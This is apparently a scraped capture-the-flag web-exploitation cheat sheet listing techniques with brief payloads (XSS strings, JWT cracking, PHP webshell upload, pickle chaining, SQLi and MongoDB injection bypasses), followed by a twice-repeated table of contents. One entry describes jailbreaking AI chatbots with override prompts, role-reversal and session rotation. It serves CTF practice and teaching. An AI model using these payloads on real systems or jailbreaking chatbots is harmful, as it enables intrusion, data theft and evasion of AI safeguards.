hashcat -m 16500 jwt.txt wordlist.txt        # JWT crack
dalfox url http://target/?q=test             # XSS

Flask/Werkzeug Debug Mode

Weak session secret brute-force + forge admin session + Werkzeug debugger PIN RCE. See server-side-advanced.md for full attack chain.

XXE with External DTD Filter Bypass

Host malicious DTD externally to bypass upload keyword filters. See server-side-advanced.md for payload and webhook.site setup.

JSFuck Decoding

Remove trailing ()(), eval in Node.js, .toString() reveals original code. See client-side.md.

DOM XSS via jQuery Hashchange (Crypto-Cat)

$(location.hash) + hashchange event → XSS via iframe: <iframe src="https://target/#" onload="this.src+='<img src=x onerror=print()>'">. See client-side.md.

Shadow DOM XSS

Proxy attachShadow to capture closed roots; (0,eval) for scope escape; </script> injection. See client-side.md.

DOM Clobbering + MIME Mismatch

.jpg served as text/html; <form id="config"> clobbers JS globals. See client-side.md.

HTTP Request Smuggling via Cache Proxy

Cache proxy desync for cookie theft via incomplete POST body. See client-side.md.

Path Traversal: URL-Encoded Slash Bypass

%2f bypasses nginx route matching but filesystem resolves it. See server-side-advanced.md.

WeasyPrint SSRF & File Read (CVE-2024-28184)

MongoDB Regex / $where Blind Injection

Break out of /.../i with a^/)||(<condition>)&&(/a^. Binary search charCodeAt() for extraction. See server-side-advanced.md.

Pongo2 / Go Template Injection

{% include "/flag.txt" %} in uploaded file + path traversal in template parameter. See server-side-advanced.md.

ZIP Upload with PHP Webshell

Upload ZIP containing .php file → extract to web-accessible dir → file_get_contents('/flag.txt'). See server-side-advanced.md.

basename() Bypass for Hidden Files

basename() only strips dirs, doesn't filter .lock or hidden files in same directory. See server-side-advanced.md.

Custom Linear MAC Forgery

Linear XOR-based signing with secret blocks → recover from known pairs → forge for target. See auth-and-access.md.

CSS/JS Paywall Bypass

Content behind CSS overlay (position: fixed; z-index: 99999) is still in the raw HTML. curl or view-source bypasses it instantly. See client-side.md.

SSRF → Docker API RCE Chain

Castor XML Deserialization via xsi:type (Atlas HTB)

Apache ErrorDocument Expression File Read (Zero HTB)

HTTP TRACE Method Bypass

Endpoints returning 403 on GET/POST may respond to TRACE, PUT, PATCH, or DELETE. Test with curl -X TRACE. See auth-and-access.md.

LLM/AI Chatbot Jailbreak

AI chatbots guarding flags can be bypassed with system override prompts, role-reversal, or instruction leak requests. Rotate session IDs and escalate prompt severity. See auth-and-access.md.

Admin Bot javascript: URL Scheme Bypass

XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty)

React Server Components Flight Protocol RCE (Ehax 2026)

Unicode Case Folding XSS Bypass (UNbreakable 2026)

CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026)

Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026)

Solidity Transient Storage Clearing Collision (0.8.28-0.8.33)

Client-Side HMAC Bypass via Leaked JS Secret (Codegate 2013)

Deobfuscate client-side JS to extract hardcoded HMAC secret, then forge signatures for arbitrary requests via browser console. See client-side.md.

SQLi Keyword Fragmentation Bypass (SecuInside 2013)

Single-pass preg_replace() keyword filters bypassed by nesting the stripped keyword inside the payload: unload_fileon → union after load_file removal. See server-side-exec.md.

Pickle Chaining via STOP Opcode Stripping (VolgaCTF 2013)

Strip pickle STOP opcode (\x2e) from first payload, concatenate second — both __reduce__ calls execute in single pickle.loads(). Chain os.dup2() for socket output. See server-side-deser.md.

XPath Blind Injection (BaltCTF 2013)

substring(normalize-space(../../../node()),1,1)='a' — boolean-based blind extraction from XML data stores via response length oracle. See server-side-exec.md.

SQLite File Path Traversal to Bypass String Equality (Codegate 2013)

Input /../gamesim_GM fails == "GM" string check but filesystem normalizes /var/game_db/gamesim_/../gamesim_GM.db to the blocked path. See server-side-advanced.md.

Common Flag Locations

/flag.txt, /flag, /app/flag.txt, /home/*/flag*
Environment variables: /proc/self/environ
Database: flag, flags, secret tables
Response headers: x-flag, x-archive-tag, x-proof
Hidden DOM: display:none elements, data attributes

ctf-web

Install

CTF Web Exploitation

Additional Resources

Reconnaissance

SQL Injection Quick Reference

XSS Quick Reference

Path Traversal / LFI Quick Reference

JWT Quick Reference

SSTI Quick Reference

SSRF Quick Reference

Command Injection Quick Reference

XXE Quick Reference

PHP Type Juggling Quick Reference

PHP File Inclusion / LFI Quick Reference

Code Injection Quick Reference

Java Deserialization

Python Pickle Deserialization

Race Conditions (TOCTOU)

Node.js Quick Reference

Auth & Access Control Quick Reference

Apache mod_status Information Disclosure

Open Redirect Chains

Subdomain Takeover

File Upload → RCE

Multi-Stage Chain Patterns

Useful Tools

Flask/Werkzeug Debug Mode

XXE with External DTD Filter Bypass

JSFuck Decoding

DOM XSS via jQuery Hashchange (Crypto-Cat)

Shadow DOM XSS

DOM Clobbering + MIME Mismatch

HTTP Request Smuggling via Cache Proxy

Path Traversal: URL-Encoded Slash Bypass

WeasyPrint SSRF & File Read (CVE-2024-28184)

MongoDB Regex / $where Blind Injection

Pongo2 / Go Template Injection

ZIP Upload with PHP Webshell

basename() Bypass for Hidden Files

Custom Linear MAC Forgery

CSS/JS Paywall Bypass

SSRF → Docker API RCE Chain

Castor XML Deserialization via xsi:type (Atlas HTB)

Apache ErrorDocument Expression File Read (Zero HTB)

HTTP TRACE Method Bypass

LLM/AI Chatbot Jailbreak

Admin Bot javascript: URL Scheme Bypass

XS-Leak via Image Load Timing + GraphQL CSRF (HTB GrandMonty)

React Server Components Flight Protocol RCE (Ehax 2026)

Unicode Case Folding XSS Bypass (UNbreakable 2026)

CSS Font Glyph + Container Query Data Exfiltration (UNbreakable 2026)

Hyperscript / Alpine.js CDN CSP Bypass (UNbreakable 2026)

Solidity Transient Storage Clearing Collision (0.8.28-0.8.33)

Client-Side HMAC Bypass via Leaked JS Secret (Codegate 2013)

SQLi Keyword Fragmentation Bypass (SecuInside 2013)

Pickle Chaining via STOP Opcode Stripping (VolgaCTF 2013)

XPath Blind Injection (BaltCTF 2013)

SQLite File Path Traversal to Bypass String Equality (Codegate 2013)

Common Flag Locations

ctf-web

Install

CTF Web Exploitation

Additional Resources

Reconnaissance

SQL Injection Quick Reference

XSS Quick Reference

Path Traversal / LFI Quick Reference

JWT Quick Reference

SSTI Quick Reference

SSRF Quick Reference

Command Injection Quick Reference

XXE Quick Reference

PHP Type Juggling Quick Reference

PHP File Inclusion / LFI Quick Reference

Code Injection Quick Reference

Java Deserialization

Python Pickle Deserialization

Race Conditions (TOCTOU)

Node.js Quick Reference